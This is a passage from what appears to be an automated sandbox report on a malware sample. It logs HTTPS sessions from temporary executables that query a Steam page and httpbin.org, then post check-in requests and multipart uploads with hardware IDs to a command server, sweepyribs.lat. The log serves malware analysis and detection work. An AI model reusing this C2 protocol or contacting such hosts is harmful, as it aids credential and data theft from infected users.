2024-12-17 05:03:25 UTC	16384	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-17 05:03:25 UTC	3768	IN	Data Raw: 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
2024-12-17 05:03:25 UTC	500	IN	Data Raw: 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 Data Ascii: Subscriber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49931	98.85.100.80	443	7092	C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:03:50 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-17 05:03:50 UTC	224	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:03:50 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-17 05:03:50 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49951	104.21.2.110	443	6528	C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:03:57 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sweepyribs.lat
2024-12-17 05:03:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-17 05:03:58 UTC	1036	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vndbd4nb71654h97gsuqoic0g6; expires=Fri, 11-Apr-2025 22:50:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3HRyY7HysFhBIfOZXhVr7z%2FqNxiOt2x7G5qKH9dQtb%2B1bOg69EzaIzkKlEfqs5CPytUelhb1Ya8sLvM1nOJzBVyLJrCig%2F7i0RMdFywVNa7u0HCpUEbYFaEDiLcNyf3mlg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345ea22df7efa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1812&rtt_var=690&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1572428&cwnd=194&unsent_bytes=0&cid=d7c594a3a7f71bb0&ts=734&x=0"
2024-12-17 05:03:58 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-17 05:03:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49959	104.21.2.110	443	6528	C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:03:59 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: sweepyribs.lat
2024-12-17 05:03:59 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-17 05:04:00 UTC	1036	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gs3me2m4ke82la70qand0kvbn1; expires=Fri, 11-Apr-2025 22:50:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TX42n7Ra%2F7rR5vnVKPjlOArxbPx2hcMtc8beCMdOf1bnyGFaAaU9pkstOqiyK65gILx1tw0r8%2FR3BmbrOtq3O7U96Nxjy3VoaEN8%2BlhXwdomuiMpYXVVGF8wbSaAhpg27A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345eae6f578c72-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1813&rtt_var=691&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=945&delivery_rate=1569892&cwnd=174&unsent_bytes=0&cid=40967657ac08c093&ts=756&x=0"
2024-12-17 05:04:00 UTC	333	IN	Data Raw: 34 65 34 0d 0a 31 49 51 6f 55 72 4c 54 52 58 33 76 4b 7a 31 4b 56 4a 62 32 69 68 47 73 4e 37 56 5a 47 4a 33 68 6e 4e 74 65 61 57 52 48 4d 7a 4b 76 70 6c 35 77 69 4f 64 70 58 35 78 4f 48 33 41 67 35 49 50 76 50 59 35 57 30 58 73 69 2b 34 44 77 71 44 74 46 52 6a 46 65 45 4f 37 69 53 54 37 42 74 6d 6c 66 69 6c 4d 66 63 41 2f 74 31 4f 39 2f 6a 67 32 58 50 48 4c 2f 67 50 43 35 50 77 49 4c 4e 31 39 52 76 4f 68 50 4f 74 65 77 49 52 79 44 52 6c 67 76 4d 66 65 63 35 48 6a 42 58 39 68 37 4e 4c 2b 45 35 76 6c 6b 53 79 6b 69 52 31 4f 5a 35 56 73 35 6b 4b 35 70 42 73 31 4f 55 32 68 75 74 4a 66 76 63 38 42 52 30 54 4a 77 39 59 6e 34 75 44 6f 44 46 43 35 56 57 72 7a 6d 54 44 76 64 75 54 55 52 69 55 46 54 4b 54 76 33 31 4b 59 7a 79 55 32 58 59 7a 71 73 73 66 32 6f 4c 52 Data Ascii: 4e41IQoUrLTRX3vKz1KVJb2ihGsN7VZGJ3hnNteaWRHMzKvpl5wiOdpX5xOH3Ag5IPvPY5W0Xsi+4DwqDtFRjFeEO7iST7BtmlfilMfcA/t1O9/jg2XPHL/gPC5PwILN19RvOhPOtewIRyDRlgvMfec5HjBX9h7NL+E5vlkSykiR1OZ5Vs5kK5pBs1OU2hutJfvc8BR0TJw9Yn4uDoDFC5VWrzmTDvduTURiUFTKTv31KYzyU2XYzqssf2oLR
2024-12-17 05:04:00 UTC	926	IN	Data Raw: 38 70 4b 2b 70 6e 49 53 52 69 4a 64 45 4f 36 6d 54 44 37 52 76 43 63 4e 68 55 4a 55 4c 53 54 2f 6e 65 56 2b 7a 6c 6a 64 4e 48 6e 2f 68 50 53 7a 4d 77 45 43 4b 46 78 57 74 75 59 4b 66 70 43 32 50 31 2f 56 43 58 77 74 4a 76 4f 59 2f 6a 48 30 46 63 68 31 59 37 2b 45 38 76 6c 6b 53 77 34 67 55 6c 4f 39 36 55 6b 34 32 36 4d 6e 44 59 74 45 57 6a 6f 77 38 5a 72 69 63 4e 78 66 32 54 31 35 39 6f 6a 33 76 44 73 50 52 6d 73 52 56 36 36 6d 45 6e 44 78 76 43 77 54 68 31 35 66 61 43 6d 36 6a 61 68 30 77 68 57 50 65 33 37 2b 68 2f 2b 39 4d 67 55 43 4b 56 64 65 75 2b 6c 4d 4f 74 43 32 4c 52 65 46 53 46 49 6a 4f 66 53 52 35 58 66 49 57 64 59 2b 4f 72 48 44 2b 61 46 38 55 30 59 4c 56 6c 4f 6b 70 48 38 7a 33 72 38 67 43 63 31 57 45 54 46 32 38 35 69 6f 4b 34 35 62 30 6a 52 Data Ascii: 8pK+pnISRiJdEO6mTD7RvCcNhUJULST/neV+zljdNHn/hPSzMwECKFxWtuYKfpC2P1/VCXwtJvOY/jH0Fch1Y7+E8vlkSw4gUlO96Uk426MnDYtEWjow8ZricNxf2T159oj3vDsPRmsRV66mEnDxvCwTh15faCm6jah0whWPe37+h/+9MgUCKVdeu+lMOtC2LReFSFIjOfSR5XfIWdY+OrHD+aF8U0YLVlOkpH8z3r8gCc1WETF285ioK45b0jR
2024-12-17 05:04:00 UTC	1369	IN	Data Raw: 34 34 33 38 0d 0a 4b 44 76 31 6e 2b 42 31 77 31 37 59 4e 48 33 33 67 50 4b 38 4d 51 68 47 61 78 46 58 72 71 59 53 63 50 57 2f 4a 41 36 63 43 32 6f 72 4f 50 71 54 2f 6a 50 52 47 38 35 37 66 66 50 44 70 76 6b 32 44 41 45 68 58 46 71 31 34 6b 34 39 33 37 67 75 46 70 39 44 55 79 59 6b 2b 5a 37 74 66 63 4a 51 32 44 74 37 2f 6f 33 30 73 6e 78 46 52 69 4a 4a 45 4f 36 6d 5a 54 33 41 6f 79 30 55 6e 41 74 71 4b 7a 6a 36 6b 2f 34 7a 30 52 76 4f 65 33 33 7a 77 36 62 35 4e 77 30 4b 4b 56 46 57 70 4f 68 46 49 74 71 6a 49 78 47 4a 52 56 45 68 4f 2f 75 52 2b 6e 66 4f 52 39 59 2b 66 66 47 4f 37 4c 78 38 52 55 59 69 53 52 44 75 70 6e 41 45 31 36 45 32 47 4d 39 38 58 43 59 34 38 34 4b 6f 62 49 42 4d 6c 7a 78 32 76 39 75 2b 75 6a 41 47 44 79 42 65 51 72 7a 71 53 79 4c 58 75 Data Ascii: 4438KDv1n+B1w17YNH33gPK8MQhGaxFXrqYScPW/JA6cC2orOPqT/jPRG857ffPDpvk2DAEhXFq14k4937guFp9DUyYk+Z7tfcJQ2Dt7/o30snxFRiJJEO6mZT3Aoy0UnAtqKzj6k/4z0RvOe33zw6b5Nw0KKVFWpOhFItqjIxGJRVEhO/uR+nfOR9Y+ffGO7Lx8RUYiSRDupnAE16E2GM98XCY484KobIBMlzx2v9u+ujAGDyBeQrzqSyLXu
2024-12-17 05:04:00 UTC	1369	IN	Data Raw: 44 57 69 77 36 2f 70 54 74 59 63 5a 54 30 44 64 79 2b 6f 7a 34 76 44 45 4d 44 53 5a 44 51 72 58 69 52 44 79 51 2f 32 63 59 6c 51 6b 48 61 42 50 6a 6c 2f 68 31 7a 52 58 49 64 57 4f 2f 68 50 4c 35 5a 45 73 47 4b 31 31 62 73 65 31 42 4e 4e 53 78 4b 68 53 44 52 31 59 6b 50 76 69 54 2b 6e 37 4c 58 64 30 79 66 2f 4f 4f 2f 61 73 2f 43 6b 5a 72 45 56 65 75 70 68 4a 77 39 34 49 51 50 4d 31 57 45 54 46 32 38 35 69 6f 4b 34 35 55 33 7a 78 30 2b 35 48 77 71 7a 49 4d 42 69 4e 5a 57 4c 48 71 52 44 37 43 75 53 59 66 67 30 5a 58 49 54 4c 31 6b 4f 78 2f 79 52 57 5a 65 33 33 6e 77 36 62 35 46 41 67 63 50 78 4e 2b 76 65 5a 4e 49 4d 61 71 5a 77 44 44 55 42 38 76 4f 72 54 4d 71 48 66 46 58 39 34 34 63 2f 75 4f 2f 72 41 7a 41 67 34 6f 57 55 4b 33 37 46 67 30 31 62 41 6f 46 59 Data Ascii: DWiw6/pTtYcZT0Ddy+oz4vDEMDSZDQrXiRDyQ/2cYlQkHaBPjl/h1zRXIdWO/hPL5ZEsGK11bse1BNNSxKhSDR1YkPviT+n7LXd0yf/OO/as/CkZrEVeuphJw94IQPM1WETF285ioK45U3zx0+5HwqzIMBiNZWLHqRD7CuSYfg0ZXITL1kOx/yRWZe33nw6b5FAgcPxN+veZNIMaqZwDDUB8vOrTMqHfFX944c/uO/rAzAg4oWUK37Fg01bAoFY
2024-12-17 05:04:00 UTC	1369	IN	Data Raw: 4e 66 79 47 36 48 37 4f 52 38 55 39 63 66 48 44 73 50 6b 37 45 30 5a 39 45 57 47 68 37 51 6f 76 6e 71 68 6e 47 49 45 4a 42 32 67 31 2f 70 6e 6d 59 63 70 54 33 44 68 30 39 34 62 32 76 54 59 47 43 53 35 62 57 62 37 6d 52 54 58 59 75 69 45 52 6a 45 39 54 4a 58 61 36 31 4f 39 72 6a 67 32 58 48 47 44 79 68 65 6d 6f 43 51 77 47 64 42 46 50 2b 50 38 4b 4e 39 7a 78 66 31 2b 41 52 56 55 6c 4d 2f 43 63 37 33 44 50 57 64 4d 32 64 2f 75 4b 2b 72 77 75 47 51 41 72 55 56 2b 34 36 55 59 69 33 72 51 6e 45 38 30 48 48 79 38 75 74 4d 79 6f 51 74 6c 56 6c 79 51 30 35 73 50 35 74 58 78 54 52 69 70 63 51 72 72 70 53 6a 48 54 74 53 77 59 69 30 39 65 4b 7a 50 33 6b 65 35 79 7a 6c 6e 64 50 48 4c 31 6a 66 4f 2f 4f 41 30 41 5a 52 38 51 73 66 34 4b 61 4a 43 44 4b 68 47 45 53 6c 6b Data Ascii: NfyG6H7OR8U9cfHDsPk7E0Z9EWGh7QovnqhnGIEJB2g1/pnmYcpT3Dh094b2vTYGCS5bWb7mRTXYuiERjE9TJXa61O9rjg2XHGDyhemoCQwGdBFP+P8KN9zxf1+ARVUlM/Cc73DPWdM2d/uK+rwuGQArUV+46UYi3rQnE80HHy8utMyoQtlVlyQ05sP5tXxTRipcQrrpSjHTtSwYi09eKzP3ke5yzlndPHL1jfO/OA0AZR8Qsf4KaJCDKhGESlk
2024-12-17 05:04:00 UTC	1369	IN	Data Raw: 4f 64 33 7a 6c 71 58 64 54 72 34 6d 37 37 68 66 43 73 4e 4d 33 42 65 76 66 51 4b 4c 35 36 6f 5a 78 69 42 43 51 64 6f 4f 50 32 56 34 48 33 43 58 64 4d 70 65 76 53 4b 38 62 67 7a 43 77 55 6b 57 31 69 6b 34 45 6f 37 32 4c 59 76 47 34 4e 62 58 69 64 32 75 74 54 76 61 34 34 4e 6c 77 70 73 2b 49 54 78 2b 78 55 4d 48 53 52 62 55 37 33 71 43 69 2b 65 71 47 63 59 67 51 6b 48 61 44 76 34 6d 65 78 68 77 6c 58 58 4d 6e 33 31 6b 66 47 32 4d 51 67 47 49 45 4e 52 70 4f 6c 42 4e 64 4f 31 4b 42 43 42 51 56 56 6f 65 4c 53 54 38 44 4f 57 46 66 73 34 61 2f 58 42 32 61 4d 71 44 41 6f 30 57 6c 32 36 70 6c 56 2b 79 66 45 67 45 38 30 52 48 79 67 33 2b 59 62 74 63 73 52 66 32 6a 4e 31 2b 6f 62 78 76 54 67 41 43 44 64 66 58 37 62 67 51 54 48 56 73 69 77 56 67 30 42 4e 61 48 69 30 Data Ascii: Od3zlqXdTr4m77hfCsNM3BevfQKL56oZxiBCQdoOP2V4H3CXdMpevSK8bgzCwUkW1ik4Eo72LYvG4NbXid2utTva44Nlwps+ITx+xUMHSRbU73qCi+eqGcYgQkHaDv4mexhwlXXMn31kfG2MQgGIENRpOlBNdO1KBCBQVVoeLST8DOWFfs4a/XB2aMqDAo0Wl26plV+yfEgE80RHyg3+YbtcsRf2jN1+obxvTgACDdfX7bgQTHVsiwVg0BNaHi0
2024-12-17 05:04:00 UTC	1369	IN	Data Raw: 74 51 33 54 64 32 2f 6f 76 33 73 7a 6b 4f 41 43 39 53 58 72 6e 6e 52 6a 54 5a 76 79 35 66 77 77 6c 59 4d 48 61 73 31 4e 35 6a 79 55 33 61 4b 7a 6a 4e 67 4f 2b 6f 4b 51 59 57 49 78 4e 2f 74 65 70 4a 4e 64 65 68 5a 77 44 44 55 42 38 76 4f 72 54 4d 71 48 50 4b 57 64 51 38 64 50 43 4f 38 62 34 33 42 41 77 72 51 31 2b 7a 37 6b 59 34 33 61 4d 74 46 5a 39 41 56 69 55 34 2f 49 62 72 4d 34 41 56 30 43 4d 36 70 38 50 4d 73 7a 38 48 45 43 68 65 45 4b 6d 6f 55 33 44 58 76 57 64 48 7a 56 74 4e 4b 44 33 30 6b 2b 5a 68 7a 31 33 59 4d 58 72 35 69 50 53 36 4e 51 38 49 4c 46 64 52 75 2b 64 4c 4d 4e 57 78 4c 67 32 41 43 52 46 6f 4d 65 7a 55 73 44 50 35 57 64 77 4b 65 65 6e 44 34 66 63 6c 53 77 45 70 45 51 6a 32 35 31 67 39 32 4c 55 6e 45 6f 74 43 58 69 6b 31 39 4a 54 72 63 Data Ascii: tQ3Td2/ov3szkOAC9SXrnnRjTZvy5fwwlYMHas1N5jyU3aKzjNgO+oKQYWIxN/tepJNdehZwDDUB8vOrTMqHPKWdQ8dPCO8b43BAwrQ1+z7kY43aMtFZ9AViU4/IbrM4AV0CM6p8PMsz8HECheEKmoU3DXvWdHzVtNKD30k+Zhz13YMXr5iPS6NQ8ILFdRu+dLMNWxLg2ACRFoMezUsDP5WdwKeenD4fclSwEpEQj251g92LUnEotCXik19JTrc
2024-12-17 05:04:00 UTC	1369	IN	Data Raw: 38 65 65 32 52 2b 4c 6f 71 43 45 45 62 62 33 43 39 38 45 73 39 32 37 30 5a 49 5a 68 4b 55 53 59 78 34 6f 57 6f 50 59 35 61 6c 32 4e 44 76 38 75 2b 68 6e 4a 4c 48 6d 55 4a 45 49 50 6c 52 44 37 58 70 7a 5a 53 72 55 4a 4a 4b 54 76 2f 6d 4b 70 79 77 30 58 51 65 7a 53 2f 68 62 37 68 62 45 56 47 49 55 41 51 37 72 59 59 61 34 58 69 63 45 2f 66 56 68 45 78 64 75 4c 55 73 43 47 41 46 63 56 37 49 72 2f 45 2f 61 73 75 44 51 55 7a 55 68 65 49 32 47 6f 37 33 4c 49 72 48 6f 6f 4a 45 57 67 35 74 4d 7a 52 4d 38 31 48 78 58 52 72 36 59 37 75 76 6e 41 44 46 79 68 64 45 50 69 6d 42 6a 54 62 76 53 49 59 6e 51 5a 4e 4f 44 33 34 67 71 52 33 33 42 57 5a 65 32 76 30 6a 4f 79 33 4f 30 51 58 4d 31 78 41 74 65 4e 4e 66 4e 69 67 4b 68 50 4e 42 78 38 39 50 66 69 53 35 57 61 42 52 4d Data Ascii: 8ee2R+LoqCEEbb3C98Es9270ZIZhKUSYx4oWoPY5al2NDv8u+hnJLHmUJEIPlRD7XpzZSrUJJKTv/mKpyw0XQezS/hb7hbEVGIUAQ7rYYa4XicE/fVhExduLUsCGAFcV7Ir/E/asuDQUzUheI2Go73LIrHooJEWg5tMzRM81HxXRr6Y7uvnADFyhdEPimBjTbvSIYnQZNOD34gqR33BWZe2v0jOy3O0QXM1xAteNNfNigKhPNBx89PfiS5WaBRM
2024-12-17 05:04:00 UTC	1369	IN	Data Raw: 6b 50 43 79 4b 67 78 47 47 68 38 51 72 71 59 53 63 4f 57 79 4b 52 47 4b 58 30 35 6c 45 50 65 54 37 6e 44 41 51 73 5a 37 4e 4c 2b 46 76 75 46 75 52 55 59 68 51 42 44 75 74 68 68 72 68 65 4a 77 54 39 39 57 45 54 46 32 34 74 53 77 49 49 41 56 78 58 73 69 76 38 54 77 74 44 30 49 43 43 5a 44 51 72 44 6c 58 44 4f 58 6a 78 6b 36 67 45 52 61 4a 6a 48 4b 71 73 6c 35 33 6c 6a 59 50 45 54 42 74 4f 2b 2b 4c 45 6b 67 4a 6b 64 54 39 71 67 4b 4b 4a 44 70 5a 7a 36 48 57 56 49 6e 4d 62 54 61 71 48 65 4f 44 5a 63 65 64 2f 4b 47 38 4c 35 2b 4b 67 77 31 58 46 2b 78 70 67 52 77 33 50 46 2f 58 34 78 44 54 79 55 35 38 39 6a 76 61 63 6b 56 6d 58 74 30 76 39 75 2b 75 44 59 62 43 79 70 57 48 4c 44 6f 52 48 44 50 2f 7a 35 66 6d 77 6b 48 65 33 69 30 68 71 67 72 6a 68 4c 5a 4e 6e 76 Data Ascii: kPCyKgxGGh8QrqYScOWyKRGKX05lEPeT7nDAQsZ7NL+FvuFuRUYhQBDuthhrheJwT99WETF24tSwIIAVxXsiv8TwtD0ICCZDQrDlXDOXjxk6gERaJjHKqsl53ljYPETBtO++LEkgJkdT9qgKKJDpZz6HWVInMbTaqHeODZced/KG8L5+Kgw1XF+xpgRw3PF/X4xDTyU589jvackVmXt0v9u+uDYbCypWHLDoRHDP/z5fmwkHe3i0hqgrjhLZNnv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49967	104.21.2.110	443	6528	C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:02 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ERH0HPPRLD0I8WLVSJ5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12841 Host: sweepyribs.lat
2024-12-17 05:04:02 UTC	12841	OUT	Data Raw: 2d 2d 45 52 48 30 48 50 50 52 4c 44 30 49 38 57 4c 56 53 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 52 48 30 48 50 50 52 4c 44 30 49 38 57 4c 56 53 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 52 48 30 48 50 50 52 4c 44 30 49 38 57 4c 56 53 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 Data Ascii: --ERH0HPPRLD0I8WLVSJ5Content-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--ERH0HPPRLD0I8WLVSJ5Content-Disposition: form-data; name="pid"2--ERH0HPPRLD0I8WLVSJ5Content-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-17 05:04:03 UTC	1047	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=40la2dv4mqdrjg1p541ptajt3o; expires=Fri, 11-Apr-2025 22:50:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pF3bZDQZnkuCUBQ9RfP2Y10D%2BSXMEKGeKKkVwbXU2WtIl%2Bk%2BzZOfgyej64AHeumr23MjYGO%2F%2FhsBHLSX3wNZCKw2paIr8cSi6HslkUie7RHSVEoIuNXjeQX0Gq%2FD0Axk7g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345ebf8c7b72a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1832&rtt_var=700&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2833&recv_bytes=13780&delivery_rate=1549893&cwnd=212&unsent_bytes=0&cid=7ae9acd353a848b7&ts=1101&x=0"
2024-12-17 05:04:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49975	104.21.2.110	443	6528	C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:05 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0GUV91G3AMJE5AW3B User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15071 Host: sweepyribs.lat
